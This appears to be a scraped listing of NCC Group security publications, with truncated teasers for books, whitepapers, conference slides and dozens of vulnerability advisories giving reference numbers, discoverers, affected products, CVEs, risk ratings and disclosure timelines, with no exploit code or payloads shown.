Author(s): Chris Anley, John Heasman, Felix Lindner and Gerardo Richarte. The Shellcoder’s Handbook takes a detailed look at why security holes appear, how to discover them and how to close them so that they can’t be exploited. In this revised 2007 second edition, many new exploitation techniques are explored that were…


Potential false redirection of web site content in Internet in SAP NetWeaver web applications

Vulnerability Summary
Title: Potential false redirection of web site content in Internet in SAP NetWeaver web applications
Release Date: 8 March 2016
Reference: …


Multiple security vulnerabilities in SAP NetWeaver BSP Logon

Vulnerability Summary
Title: Multiple security vulnerabilities in SAP NetWeaver BSP Logon
Release Date: 8 March 2016
Reference: NCC00837
Discoverer: …


My name is Matt – My voice is my password

Voice biometrics are becoming an attractive mechanism for authenticating users in online and mobile environments. They may, however, not always be the best choice of authentication mechanism, depending on the performance and assurance requirements of the underlying application. A feasibility study should always be performed on the use of biometrics…


Local network compromise despite good patching

A common misconception by Windows system administrators is that keeping operating systems fully updated is sufficient to keep them secure. However, even on a network which is fully patched and using the latest Windows operating systems, it is often trivial for an internal attacker to obtain user credentials, and in…


Secure Messaging for Normal People

In this paper, Justin Engler discusses the challenges of secure messaging for normal people based on his presentation entitled “Secure Messaging” from DEF CON 23. “Secure” messaging programs and protocols continue to proliferate, and crypto experts can debate their minutiae, but there is very little information available to help the rest of…


Private sector cyber resilience and the role of data diodes

Abstract: Governments and businesses recognise that absolute cyber security is neither possible nor practical. In the public sector the risks are in part addressed by the adoption of various compensating controls that align with various protective marking schemes. The nations which have adopted these controls have also developed resilience strategies, in…


General Data Protection Regulation – are you ready?

With the finalisation of the General Data Protection Regulation (GDPR) it is time for businesses to take stock and prepare for the requirements which will soon be imposed. The GDPR replaces the 1995 EU directive (Directive 95/46/EC ) and begins a new chapter in European privacy. The regulation was published…


Business Insights: Cyber Security in the Financial Sector

Not only are cyber attacks becoming more frequent, they are also becoming more persistent, targeted and at times sophisticated, often causing widespread impact. While some boards and executives of financial services (FS) organisations are being urged to place cyber security at the top of their risk agenda, there still often…


Building Systems from Commercial Components

Author: Kurt Wallnau, Scott Hissam, Robert Seacord
Robert Seacord, principal security consultant at NCC Group, has co-authored Building Systems from Commercial Components. The book describes a number of proven techniques, as well as much-needed guidance on how to build component-based systems in a real working environment. Click here for more…


Modernizing Legacy Systems: Software Technologies, Engineering Processes, and Business Practices

Author: Robert Seacord, Daniel Plakosh, Grace Lewis
Robert Seacord, principal security consultant at NCC Group, has written a book about Modernizing Legacy Systems. The book uses an extensive real-world case study (based on the modernisation of a 30-year-old retail system) to show how modernising legacy systems can deliver significant…


Secure Coding in C and C++

Author: Robert Seacord
Robert Seacord, principal security consultant at NCC Group, has written a book about secure coding in C and C++. Readers will be able to learn the root causes of software vulnerabilities and how to avoid them. The book covers some technical details on how to improve the…


CERT Oracle Secure Coding Standard for Java

Author: Fred Long, Dhruv Mohindra, Robert Seacord, Dean Sutherland, David Svoboda
Robert Seacord, principal security consultant at NCC Group, has co-authored the CERT Oracle Secure Coding Standard for Java. The book provides a high-level introduction to Java application security and seventeen consistently organized chapters detailing specific rules for key areas of Java development.…


CERT C Secure Coding Standard

Author: Robert Seacord
Robert Seacord, principal security consultant at NCC Group, has written a book about the CERT C Secure Coding Standard. The book is the essential desktop reference documenting the first official release of The CERT® C Secure Coding Standard. It provides guidelines with examples of insecure code as well as secure,…


Java Coding Guidelines: 75 Recommendations for Reliable and Secure Programs

Author: Fred Long, Dhruv Mohindra, Robert Seacord, Dean Sutherland, David Svoboda
Robert Seacord, principal security consultant at NCC Group, has co-authored Java Coding Guidelines: 75 Recommendations for Reliable and Secure Programs. The book provides realistic guidance to help Java developers implement desired functionality with security, reliability and maintainability goals in mind.…


Professional C Programming LiveLessons, (Video Training) Part I: Writing Robust, Secure, Reliable Code

Author: Robert Seacord
Robert Seacord, principal security consultant at NCC Group, has created a video book showcasing LiveLessons on professional C programming. The video book provides an in-depth explanation of how to use common C language features to produce robust, secure, and reliable code. Click here for more information.


Secure Coding in C and C++, 2nd Edition

Author: Robert Seacord
Robert Seacord, principal security consultant at NCC Group, has written a book about secure coding in C and C++. Readers will be able to learn the root causes of software vulnerabilities and how to avoid them. As part of the second edition, the book features topics such…


The CERT® C Coding Standard, Second Edition: 98 Rules for Developing Safe, Reliable, and Secure Systems

Author: Robert Seacord
Robert Seacord, principal security consultant at NCC Group, has written a book about the CERT C Coding Standard. The book is the essential reference for any developer who wishes to write secure and resilient software in C and C++. Click here for more information.


Secure Coding Rules for Java LiveLessons, Part 1

Author: Robert Seacord
Robert Seacord, principal security consultant at NCC Group, has created a video book about secure coding rules for Java. It provides developers with practical guidance for developing Java programs that are robust and secure. Click here for more information.


Hacking Displays Made Interesting

Many people are unaware that video displays send data which is then processed by the connected device and that this data can contain security threats. This paper aims to act as a useful introduction to the technologies involved in video interfacing, the potential for security vulnerabilities and ways to test for their…


What the HEC? Security implications of HDMI Ethernet Channel and other related protocols

These slides come from Andy Davis’ presentation “What the HEC? Security implications of HDMI Ethernet Channel and other related protocols” that was given at 44Con in 2012. In this presentation Andy discusses the importance of, and security issues surrounding, HDMI, the CEC protocol and the HEC protocol. Download our slides…


44CON Workshop – How to assess and secure iOS apps

These slides are supporting documentation used as part of a 44CON workshop we held in September 2013 which was delivered by Bernardo Damele on assessing and securing iOS apps. Download Presentation


Payment Card Industry Data Security Standard (PCI DSS) A Navigation and Explanation of Changes from v2.0 to v3.0

Over a series of Webinars Rob Chahin of NCC Group presented on the changes to PCI DSS from V2.0 to V3.0. The presentation will explain the changes to requirements that will be implemented from version 2.0 to version 3.0. Download presentation


Mobile World Congress – Mobile Internet of Things

NCC Group Research Director Andy Davis presented on The Mobile Internet of Things and Cyber Security at this year’s Mobile World Congress in Barcelona. The presentation covered how everything from rubbish bins to refrigerators have been in the spotlight recently from a security point of view and the key things…


Practical SME security on a shoestring

These slides come from a presentation given by Matt Summers at the Cyber Security Breakfast Meetings for Industry in February. “Security is big business, with new threats emerging every day and companies offering software and services to mitigate these threats; securing your network can be expensive. No one has an…


BlackHat Asia USB Physical Access

NCC Group Research Director Andy Davis presented ‘USB Attacks Need Physical Access Right? Not Any More…’ at this year’s BlackHat Asia in Singapore. Due to recent advances in a number of remoting technologies, USB attacks can now be launched over a network. The talk went into detail about how these…


How we breach network infrastructures and protect them

We showcased at a client’s corporate event how we technically assess and breach network infrastructures, before attackers do. Throughout the talk a number of questions were answered: what network design mistakes and defective assumptions lead to security breaches? What are the weakest entry points of your network perimeter? How do…


Hacking a web application

NCC Group’s Thomas MacKenzie delivered this live demo on how to hack websites during the NCC Group website performance and optimisation day. Download presentation


Batten down the hatches: Cyber threats facing DP operations

These slides are from Andy Davis’ presentation at the European Dynamic Positioning Conference in London. The presentation looks at the cyber threats facing dynamic positioning operations, along with some short-term solutions to increase levels of cyber security. Download presentation


Threats and vulnerabilities within the Maritime and shipping sectors

These slides are from Yevgen Dyryavyy’s presentation at the Smart Operations summit in Hong Kong. The presentation, Threats and vulnerabilities within the Maritime sector, features excerpts from the whitepaper he recently authored about the potential weaknesses within Electronic Chart Display and Information Systems and shipboard networks. It also features a…


Distributed Ledger (Blockchain) Security and Quantum Computing Implications

NCC Group was recently posed the following by one of our UK CISO Research Council members: ‘Blockchain (especially BitCoin) is highly dependent on elliptic curve crypto and hashes like SHA256 and RIPEMD-160, which are all vulnerable to quantum computing attacks using Shor’s and Grover’s algorithms. The banks are all going…


A few notes on usefully exploiting libstagefright on Android 5.x

At NCC Group, a colleague and I recently spent some time trying to develop a more robust exploit for the Android libstagefright bug CVE-2015-3684. This is a bug that persisted through the patches Joshua Drake (jduck) originally provided to Google, so a few more firmware versions are vulnerable. In this…


eBook – Do you know how your organisation would react in a real-world attack scenario?

Do you know how your organisation would react in a real-world attack scenario? Find out where your weaknesses lie with a Red Team Assessment and take action now to improve your security posture. In today’s threat landscape, how to mitigate risk and prevent an organisation from becoming victim to a…


Erlang Security 101

This whitepaper is about Erlang Security. NCC Group’s Security Technical Assurance team performs code reviews for clients on numerous different programming languages. Some are well understood from a security perspective (e.g. C, C++, C#, PHP and Python etc.) and some less so. We’ve been doing Erlang security focused code reviews…


SysAid Helpdesk blind SQL injection

This patch notification details a high risk vulnerability in SysAid Helpdesk, discovered by Daniel Compton. Download patch notification


SysAid Helpdesk stored XSS

This patch notification details a high risk vulnerability in SysAid Helpdesk, discovered by Daniel Compton. Download patch notification


Virtual Access Monitor Multiple SQL Injection Vulnerabilities

This patch notification details a number of high risk vulnerabilities in Virtual Access Monitor that have been discovered by Ken Wolstencroft Download Patch Notification


Whatsupgold Premium Directory traversal

This patch notification details a high risk vulnerability in Whatsupgold Premium that has been discovered by Daniel Compton. Download Patch Notification


Windows USB RNDIS driver kernel pool overflow

This patch notification details a high risk vulnerability discovered by Andy Davis within Microsoft Windows. Download Patch Notification


Threat Intelligence: Benefits for the Enterprise

Today we have released a new whitepaper titled: ‘Threat Intelligence: Benefits for the Enterprise’. This paper builds on a number of supporting blog posts we’ve published over the last seven months, namely:
Understanding commercial sector threat intelligence and cyber security
Threat intelligence: what we can learn from malware analysis
Threat…


Best Practices for the use of Static Code Analysis within a Real-World Secure Development Lifecycle

Static application security testing (SAST) is the analysis of computer software that is performed without the need to actually execute the program. The term is usually applied to analysis performed by an automated tool, whereas human analysis is typically called security-focused code review. The primary objective of SAST is to…


eBook – Planning a robust incident response process

Author: David Cannings This eBook is a simple workbook that walks you through some of the key takeaways to building your own incident response process in your organisation. It provides you with some insight into why a robust incident response plan is needed, the kinds of things that are at…


HDMI Ethernet Channel

HDMI is more than just a tool for displaying video, and with increasing numbers of new laptops and PCs using the function it is important for organisations to understand the potential security issues that are likely to arise as the protocols start to become more widely used. This paper will…


Advanced SQL Injection in SQL Server Applications

In this paper the author will explain, in detail, the common SQL injection technique, as it applies to the popular Microsoft Internet Information Server/Active Server Pages/SQL Server platform. The paper will also cover the various ways in which SQL can be injected into the application and addresses some of the…


USB keyboards by post – use of embedded keystroke injectors to bypass autorun restrictions on modern desktop operating systems

In this threat brief we will discuss the existence of embedded USB keyboards, which are becoming increasingly common. These keyboard-like devices can be used to bypass the security enhancements in modern operating systems, or configuration settings, that stop the automatic execution of code from USB devices. However these devices…


ASP.NET Security and the Importance of KB2698981 in Cloud Environments

In September 2012 NCC Group noted a security issue relating to the use of ASP.NET forms authentication in a shared/cloud hosting environment, which could potentially allow an attacker to successfully authenticate to an application for which they do not have valid credentials. This threat brief will discuss this issue in…


Xen HYPERVISOR_xen_version stack memory revelation

Vulnerability Summary
Title: Xen HYPERVISOR_xen_version stack memory revelation
Release Date: 6 March 2015
Reference: NCC00817
Discoverer: Aaron Adams
Vendor: Xen
Vendor Reference: XSA-122
Systems Affected: All
CVE Reference: CVE-2015-2045
Risk: Low
Status: Fixed
Download our technical advisory


Windows Remote Desktop Memory Corruption Leading to RCE on XPSP3

Summary
Name: Windows Remote Desktop Memory Corruption Leading to RCE on XPSP3
Release Date: 30 November 2012
Reference: NGS00288
Discoverer: Edward Torkington
Vendor: Microsoft
Vendor Reference:
Systems Affected: Windows XP SP3
Risk: Critical
Status: Published
TimeLine
Discovered: 2 April 2012
Released: 11 May 2012
Approved: 11 May 2012
Reported: 16 April 2012
Fixed: 14 August 2012
Published: 30 November 2012
Description
Terminal Services…


SysAid Helpdesk Pro – Blind SQL Injection

Summary
Name: SysAid Helpdesk Pro – Blind SQL Injection
Release Date: 30 November 2012
Reference: NGS00241
Discoverer: Daniel Compton
Vendor: SysAid
Vendor Reference:
Systems Affected: SysAid Helpdesk 8.5 Pro
Risk: High
Status: Published
TimeLine
Discovered: 12 March 2012
Released: 12 March 2012
Approved: 12 March 2012
Reported: 14 March 2012
Fixed: 1 August 2012
Published: 30 November 2012
Description
SysAid Helpdesk V8.5.04 Pro…


Symantec Messaging Gateway SSH with backdoor user account + privilege escalation to root due to very old Kernel

Summary
Name: Symantec Messaging Gateway – SSH with backdoor user account + privilege escalation to root due to very old Kernel
Release Date: 30 November 2012
Reference: NGS00267
Discoverer: Ben Williams
Vendor: Symantec
Vendor Reference:
Systems Affected: Symantec Messaging Gateway 9.5.3-3
Risk: High
Status: Published
TimeLine
Discovered: 18 April 2012
Released: 18 April 2012
Approved: 29 April 2012
Reported: 30 April…


Symantec Messaging Gateway Easy CSRF to add a backdoor-administrator (for example)

Summary
Name: Symantec Messaging Gateway – Easy CSRF to add a backdoor-administrator (for example)
Release Date: 30 November 2012
Reference: NGS00263
Discoverer: Ben Williams
Vendor: Symantec
Vendor Reference:
Systems Affected: Symantec Messaging Gateway 9.5.3-3
Risk: High
Status: Published
TimeLine
Discovered: 16 April 2012
Released: 16 April 2012
Approved: 29 April 2012
Reported: 30 April 2012
Fixed: 27 August 2012
Published: 30 November 2012…


Symantec Backup Exec 2012 – Persistent XSS Vulnerability Affecting Custom Reports

Summary
Name: Symantec Backup Exec 2012 – Persistent XSS Vulnerability Affecting Custom Reports
Release Date: 2 October 2013
Reference: NGS00341
Discoverer: Daniele Costa
Vendor: Symantec
CVE Reference: CVE-2013-4676
Systems Affected: Symantec Backup Exec 2012
Risk: High
Status: Published
TimeLine
Discovered: 10 July 2012
Released: 10 July 2012
Approved: 10 July 2012
Reported: 10 July 2012
Fixed: 1 August 2013
Published: 30 September 2013…


Symantec Backup Exec 2012 – OS version and service pack information leak

Summary
Name: Symantec Backup Exec 2012 – OS version and service pack information leak
Release Date: 2 October 2013
Reference: NGS00344
Discoverer: Andy Davis
Vendor: Symantec
CVE Reference: CVE-2013-4678
Systems Affected: Symantec Backup Exec 2012
Risk: Medium
Status: Published
TimeLine
Discovered: 18 July 2012
Released: 18 July 2012
Approved: 18 July 2012
Reported: 18 July 2012
Fixed: 1 August 2013
Published: 30 September…


Symantec Backup Exec 2012 – Linux Backup Agent Heap Overflow

Summary
Name: Symantec Backup Exec 2012 – Linux Backup Agent Heap Overflow
Release Date: 10 August 2012
Reference: NGS00342
Discoverer: Perran Hill <perran.hill@nccgroup.com>
Vendor: Symantec
CVE Reference: CVE-2013-4575
Systems Affected: Symantec Backup Exec 2012
Risk: High
Status: Released
TimeLine
Discovered: 13 July 2012
Released: 13 July 2012
Approved: 13 July 2012
Reported: 13 July 2012
Fixed: 1 August 2013
Published: 30 September 2013…


Symantec Backup Exec 2012 Backup/Restore Data Traverses Memory with Weak ACLs

Summary
Name: Symantec Backup Exec 2012 Backup/Restore Data Traverses Memory with Weak ACLs (RW Everyone)
Release Date: 2 October 2013
Reference: NGS00347
Discoverer: Edward Torkington <edward.torkington@nccgroup.com>
Vendor: Symantec
CVE Reference: CVE-2013-4677
Systems Affected: Symantec Backup Exec 2012
Risk: Medium
Status: Published
TimeLine
Discovered: 24 July 2012
Released: 24 July 2012
Approved: 24 July 2012
Reported: 24 July 2012
Fixed: 1 August 2013
Published:…


Symantec Backup Exec 2012 – Backup Exec Utility Stored XSS when adding Groups, Servers and Computers

Summary
Name: Symantec Backup Exec 2012 – Backup Exec Utility Stored XSS when adding Groups, Servers and Computers
Release Date: 20 August 2012
Reference: NGS00340
Discoverer: Matt Lewis <matt.lewis@nccgroup.com>
Vendor: Symantec
CVE Reference: CVE-2013-4676
Systems Affected: Symantec Backup Exec 2012
Risk: High
Status: Released
TimeLine
Discovered: 6 July 2012
Released: 6 July 2012
Approved: 6 July 2012
Reported: 6 July 2012
Fixed:…


Squiz CMS File Path Traversal

Summary
Name: Squiz CMS – File Path Traversal
Release Date: 30 November 2012
Reference: NGS00330
Discoverer: Robert Ray
Vendor: Squiz
Vendor Reference: 11846
Systems Affected: Squiz CMS V11654
Risk: High
Status: Published
TimeLine
Discovered: 29 June 2012
Released: 29 June 2012
Approved: 2 July 2012
Reported: 9 July 2012
Fixed: 9 August 2012
Published: 30 November 2012
Description
Squiz CMS V11654 – File…


Solaris 11 USB Hub Class descriptor kernel stack overflow

Summary – 02.11.2011
Name: Solaris 11 USB Hub Class descriptor kernel stack overflow
Release Date: 2 November 2011
Reference: NGS00042
Discoverer: Andy Davis
Vendor: Oracle
Vendor Reference:
Systems Affected: Solaris 8, 9, 10, and 11 Express
Risk: High
Status: Published
TimeLine
Discovered: 27 January 2011
Released: 27 January 2011
Approved: 27 January 2011
Reported: 27 January 2011
Fixed: 19 July 2011
Published: 2 November…


SmarterMail – Stored XSS in emails

VULNERABILITY SUMMARY
Title: SmarterMail – Stored XSS in emails
Release Date: 6 March 2015
Reference: NCC00776
Discoverer: Soroush Dalili
Vendor: Smarter Tools
Systems Affected: v13.1.5451 and prior
CVE Reference: TBC
Risk: Medium
Status: Fixed
Download our technical advisory


Remote code execution in ImpressPages CMS

Summary
Name: Remote code execution in ImpressPages CMS
Release Date: 5 January 2012
Reference: NGS00109
Discoverer: David Middlehurst
Vendor: ImpressPages
Vendor Reference:
Systems Affected: ImpressPages CMS 1.0.12
Risk: High
Status: Published
TimeLine
Discovered: 28 August 2011
Released: 28 August 2011
Approved: 28 August 2011
Reported: 5 September 2011
Fixed: 21 September 2011
Published: 5 January 2012
Description
ImpressPages CMS (1.0.12) is prone to…


OS X 10.6.6 Camera Raw Library Memory Corruption

Summary – 28.06.2011
Name: OS X 10.6.6 Camera Raw Library Memory Corruption
Reference: NGS00052
Discoverer: Paul Harrington
Vendor: Apple
Vendor Reference: 140299872
Systems Affected: OS X 10.6.6 with RawCamera.bundle < 3.6
Risk: High
Status: Published
TimeLine
Discovered: 22 February 2011
Released: 22 February 2011
Approved: 22 February 2011
Reported: 23 February 2011
Fixed: 21 March 2011
Published: 28 June 2011
Description
A corrupt…


Oracle Java Installer Adds a System Path Which is Writable by All

Vulnerability Summary
Title: Oracle Java Installer Adds a System Path Which is Writable by All Users
Release Date: 21 January 2015
Reference: NCC00767
Discoverer: Edd Torkington
Vendor: Oracle
Vendor Reference: S0514586
Systems Affected: Oracle Java 8 Version 25
CVE Reference: …


Oracle Hyperion 11 Directory Traversal

Summary
Name: Oracle Hyperion 11 – Directory Traversal
Release Date: 30 July 2013
Reference: NGS00434
Discoverer: Richard Warren <richard.warren@nccgroup.com>
Vendor: Oracle
Vendor Reference: S0318807
Systems Affected: Oracle Hyperion 11.1.1.3, 11.1.1.4.107 and earlier, 11.1.2.1.129 and earlier, and 11.1.2.2.305 and earlier
Risk: High
Status: Published
TimeLine
Discovered: 20 November 2012
Released: 20 November 2012
Approved: 20 November 2012
Reported: 20 November 2012
Fixed: 16…


Oracle E-Business Suite Pre-Auth SQLi with DBA Privileges

Vulnerability Summary
Title: Oracle E-Business Suite Pre-Auth SQLi with DBA Privileges
Release Date: 21 January 2015
Reference: NCC00774
Discoverer: Edd Torkington
Vendor: Oracle
Vendor Reference: S0524388
Systems Affected: 11.5.10.2, 12.0.4,…


Nessus Authenticated Scan – Local Privilege Escalation

Title: Nessus Authenticated Scan – Local Privilege Escalation
Release Date: 20 March 2014
Reference: NGS00643
Discoverer: Neil Jones
Vendor: Tenable
Vendor Reference: RWZ-21387-181
Systems Affected: Nessus appliance engine version 5.2.1, plugin set 201402092115
CVE Reference:
Risk: High
Status: Fixed
Download our technical advisory


NCC Group Malware Technical Note

NCC Group’s Cyber Defence Operations team has released a technical note about the Derusbi Server variant, which we encountered on an engagement at the end of last year. You can download this using the link to the right. Download our technical advisory


Nagios XI Network Monitor – Stored and Reflective XSS

Summary
Name: Nagios XI Network Monitor – Stored and Reflective XSS
Release Date: 30 November 2012
Reference: NGS00195
Discoverer: Daniel Compton
Vendor: Nagios
Vendor Reference: 0000284
Systems Affected: 2011R1.9
Risk: High
Status: Published
TimeLine
Discovered: 30 January 2012
Released: 31 January 2012
Approved: 31 January 2012
Reported: 31 January 2012
Fixed: 4 June 2012
Published: 30 November 2012
Description
Nagios XI Network Monitor…


Multiple Vulnerabilities in MailEnable

Vulnerability Summary
Title: Multiple Vulnerabilities in MailEnable
Release Date: 10 March 2015
Reference: NCC00777, NCC00778, NCC00779, NCC00780
Discoverer: Soroush Dalili (@irsdl)
Vendor: MailEnable
Vendor Reference: http://www.mailenable.com/
Systems Affected: Tested on version 8.56 (versions prior to 8.60, 7.60, 6.88, and 5.62 should be vulnerable)
CVE Reference: TBC
Risk: High
Status: Fixed…


Microsoft Internet Explorer CMarkup Use-After-Free

Vulnerability Summary
Title: Microsoft Internet Explorer CMarkup Use-After-Free
Release Date: 6 October 2014
Reference: NGS00704
Discoverer: Edward Torkington
Vendor: Microsoft
Vendor Reference: 19160
Systems Affected: IE6-11
CVE Reference: CVE-2014-1799
Risk: High
Status: Fixed
Resolution Timeline
Discovered: 22 May 2014
Reported: 22 May 2014
Released: 22 May 2014
Fixed: 22 June 2014
Published: 6 October 2014
(The time between the bug being fixed and this advisory published…


McAfee Email and Web Security Appliance v5.6 – Session hijacking (and bypassing client-side session timeouts)

Summary
Name: McAfee Email and Web Security Appliance v5.6 – Session hijacking (and bypassing client-side session timeouts)
Release Date: 30 November 2012
Reference: NGS00154
Discoverer: Ben Williams
Vendor: McAfee
Vendor Reference:
Systems Affected:
Risk: Medium
Status: Published
TimeLine
Discovered: 7 November 2011
Released: 28 November 2011
Approved: 28 November 2011
Reported: 4 December 2011
Fixed: 13 March 2012
Published: 30 November 2012
Description
McAfee…


McAfee Email and Web Security Appliance v5.6 – Password hashes can be recovered from a system backup and easily cracked

Summary
Name: McAfee Email and Web Security Appliance v5.6 – Password hashes can be recovered from a system backup and easily cracked
Release Date: 30 November 2012
Reference: NGS00157
Discoverer: Ben Williams
Vendor: McAfee
Vendor Reference:
Systems Affected:
Risk: Medium
Status: Published
TimeLine
Discovered: 25 November 2011
Released: 29 November 2011
Approved: 29 November 2011
Reported: 4 December 2011
Fixed: 13 March 2012
Published:…


McAfee Email and Web Security Appliance v5.6 – Arbitrary file download is possible with a crafted URL, when logged in as any user

Summary
Name: McAfee Email and Web Security Appliance v5.6 – Arbitrary file download is possible with a crafted URL, when logged in as any user
Release Date: 30 November 2012
Reference: NGS00158
Discoverer: Ben Williams
Vendor: McAfee
Vendor Reference:
Systems Affected:
Risk: Medium
Status: Published
TimeLine
Discovered: 26 November 2011
Released: 29 November 2011
Approved: 29 November 2011
Reported: 4 December 2011
Fixed:…


McAfee Email and Web Security Appliance v5.6 – Any logged-in user can bypass controls to reset passwords of other administrators

Summary
Name: McAfee Email and Web Security Appliance v5.6 – Any logged-in user can bypass controls to reset passwords of other administrators
Release Date: 30 November 2012
Reference: NGS00155
Discoverer: Ben Williams
Vendor: McAfee
Vendor Reference:
Systems Affected:
Risk: High
Status: Published
TimeLine
Discovered: 7 November 2011
Released: 29 November 2011
Approved: 29 November 2011
Reported: 4 December 2011
Fixed: 13 March 2012
Published:…


McAfee Email and Web Security Appliance v5.6 – Active session tokens of other users are disclosed within the UI

Summary
Name: McAfee Email and Web Security Appliance v5.6 – Active session tokens of other users are disclosed within the UI
Release Date: 30 November 2012
Reference: NGS00156
Discoverer: Ben Williams
Vendor: McAfee
Vendor Reference:
Systems Affected:
Risk: Medium
Status: Published
TimeLine
Discovered: 8 November 2011
Released: 29 November 2011
Approved: 29 November 2011
Reported: 4 December 2011
Fixed: 13 March 2012
Published: 30…


iOS 7 arbitrary code execution in kernel mode

Title: iOS 7 arbitrary code execution in kernel mode
Release Date: 14 March 2014
Reference: NGS00596
Discoverer: Andy Davis
Vendor: Apple
Vendor Reference: 600217059
Systems Affected: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later
CVE Reference: CVE-2014-1287
Risk: High
Status: Fixed
Download our technical advisory


Understanding Microsoft Word OLE Exploit Primitives: Exploiting CVE-2015-1642 Microsoft Office CTaskSymbol Use-After-Free Vulnerability

Until November 2013 (CVE-2013-3906), exploit primitives for Object Linking and Embedding (OLE) objects were not discussed publicly. This changed at BlackHat USA 2015, when Haifei Bing presented “Attacking Interoperability: An OLE Edition”. This talk examined the internals of OLE embedding. Over the past few months, several malware campaigns targeting high-profile…


Porting the Misfortune Cookie Exploit: A Look into Router Exploitation Using the TD-8817

By using just a few commonly available tools and a bit of time, it is possible to port the Misfortune Cookie exploit to exploit a TD-8817 V8 router running the latest firmware and gain reliable control over its web interface without crashing the router, even after repeated exploitation attempts. In…


Research Insights Volume 6: Common Issues with Environment Breakouts

Due to the rising trend in organisations implementing bring your own device (BYOD) and remote access working, IT departments are facing the ongoing risks of securing devices they neither own nor control. This has led to a rise in the number…


Common Security Issues in Financially-Oriented Web Applications

A guideline for penetration testers to assess ecommerce and financial services applications. This document summarises NCC Group’s experience of assessing ecommerce and financial services applications, providing a checklist of common security issues seen in financial services web applications. In NCC Group’s experience, one of the best ways to identify the…


Research Insights Volume 3 – How are we breaking in: Mobile Security

The proliferation of the personal and business use of mobile devices has created a strong demand for mobile security assurance. Mobile apps and devices can suffer from many of the same vulnerabilities as traditional systems but also require new approaches to security testing and risk assessment. This white paper looks to highlight some of…


Exploiting MS15-061 Use-After-Free Windows Kernel Vulnerability

tl;dr In June 2015, Microsoft released the MS15-061 advisory to address a number of vulnerabilities. Today we’ve released a detailed analysis of one of these vulnerabilities, in the win32k.sys driver, and documented the necessary details for exploiting this class of vulnerability on Microsoft Windows 7 Service Pack 1. This is…


Password and brute-force mitigation policies

The @NCCGroupInfosec team performs security assessments across many different sectors and technologies. Regardless of the system being assessed, one of the most common issues we identify pertains to the use of weak passwords – permitted by an inadequate password policy. Systems that do not enforce a strong password policy can…


Understanding Ransomware: Impact, Evolution and Defensive Strategies

This whitepaper, produced by our Cyber Defence Operations team, is about the understanding of ransomware. It examines the impact, evolution and defensive strategies that can be employed by organisations. It is primarily focused on Microsoft Windows due to the historic prevalence and devastating impact of ransomware on this platform, but…


Lumension Device Control (formerly Sanctuary) remote memory corruption

Summary – 24.08.2011
Name: Lumension Device Control (formerly Sanctuary) remote memory corruption
Release Date: 24 August 2011
Reference: NGS00054
Discoverer: Andy Davis <andy.davis@ngssecure.com>
Vendor: Lumension
Vendor Reference:
Systems Affected: Lumension Device Control v4.4 SR6
Risk: High
Status: Published
TimeLine
Discovered: 3 March 2011
Released: 3 March 2011
Approved: 3 March 2011
Reported: 3 March 2011
Fixed: 24 May 2011
Published: 24 August 2011
Description…


LibAVCodec AMV Out of Array Write

Summary – 31.07.2011
Name: LibAVCodec AMV Out of Array Write
Release Date: 31 July 2011
Reference: NGS00068
Discoverer: Dominic Chell
Vendor: VideoLAN
Vendor Reference: CVE-2011-1931
Systems Affected: VLC media player 1.1.9 and earlier releases
Risk: High
Status: Published
TimeLine
Discovered: 31 March 2011
Released: 31 March 2011
Approved: 31 March 2011
Reported: 21 April 2011
Fixed: 21 April 2011
Published: 31 July 2011
Description…


Increased exploitation of Oracle GlassFish Server Administration Console Remote Authentication Bypass

Summary
Name: Increased exploitation of Oracle GlassFish Server Administration Console Remote Authentication Bypass Vulnerability
Release Date: 5 January 2012
Reference: NGS00106
Discoverer: David Spencer
Vendor: Oracle
Vendor Reference:
Systems Affected: Oracle GlassFish Server 2.1 and 3
Risk: High
Status: Published
TimeLine
Discovered: 26 August 2011
Released: 26 August 2011
Approved: 26 August 2011
Reported: 26 August 2011
Fixed: July 2011
Published: 5 January…


Flash security restrictions bypass: File upload by URLRequest

Vulnerability Summary
Title: Flash security restrictions bypass: File upload by URLRequest
Release Date: 13 March 2015
Reference: NCC00765
Discoverer: Soroush Dalili
Vendor: Adobe
Vendor Reference: PSIRT-3146
Systems Affected: Adobe Flash Player <=16.0.0.305, <=13.0.0.269, 11.2.202.442
CVE Reference: CVE-2015-0340…


Immunity Debugger Buffer Overflow

Summary – 22.03.2011
Name: Immunity Debugger Buffer Overflow
Release Date: 22 March 2011
Reference: NGS00016
Discoverer: Paul Harrington
Vendor: Immunity Inc
Vendor Reference: Support #3171
Systems Affected: Windows
Risk: Low
Status: Fixed
TimeLine
Discovered: 28 October 2010
Released: 28 October 2010
Approved: 28 October 2010
Reported: 28 October 2010
Fixed: 6 December 2010
Published: 22 March 2011
Description
Immunity Debugger V1.73 contains a buffer…


DataArmor Full Disk Encryption 3.0.12c – Restricted Environment breakout, Privilege Escalation and Full Disk Decryption

Summary
Name: DataArmor Full Disk Encryption 3.0.12c – Restricted Environment breakout, Privilege Escalation and Full Disk Decryption
Release Date: 30 November 2012
Reference: NGS00193
Discoverer: Stuart Passe
Vendor: Mobile Armor
Vendor Reference: KB #1060043
Systems Affected: All versions of DataArmor and DriveArmor prior to v3.0.12.861
Risk: Critical
Status: Published
TimeLine
Discovered: 10 January 2012
Released: 17 January 2012
Approved: 17…


Cups-filters remote code execution

VULNERABILITY SUMMARY
Title: cups-filters remote code execution
Release Date: 6 March 2015
Reference: NCC00816
Discoverer: Paul Collett
Vendor: Linux Foundation
Systems Affected: All Linux
CVE Reference: CVE-2014-2707
Risk: High
Status: Published
Download our technical advisory


Critical Risk Vulnerability in SAP Message Server (Heap Overflow)

Summary
Name: SAP Message Server Heap Overflow
Release Date: 5 July 2007
Reference: NGS00485
Discoverer: Mark Litchfield <mark@ngssoftware.com>
Vendor: SAP
Vendor Reference: SECRES-292
Systems Affected: All Versions
Risk: Critical
Status: Fixed
TimeLine
Discovered: 4 January 2007
Released: 19 January 2007
Approved: 29 January 2007
Reported: 11 January 2007
Fixed: 2 May 2007
Published:
Description
The Message Server is a service used by the different application servers to…


Critical Risk Vulnerability in SAP DB Web Server (Stack Overflow)

Summary
Name: SAP DB Web Server Stack Overflow
Release Date: 5 July 2007
Reference: NGS00486
Discoverer: Mark Litchfield <mark@ngssoftware.com>
Vendor: SAP
Vendor Reference: SECRES-291
Systems Affected: All Versions
Risk: Critical
Status: Fixed
TimeLine
Discovered: 3 January 2007
Released: 19 January 2007
Approved: 29 January 2007
Reported: 11 January 2007
Fixed: 27 March 2007
Published:
Description
SAP DB is an open source database server sponsored by SAP…


Critical Risk Vulnerability in Ingres (Pointer Overwrite 2)

Summary
Name: Ingres remote unauthenticated pointer overwrite 2
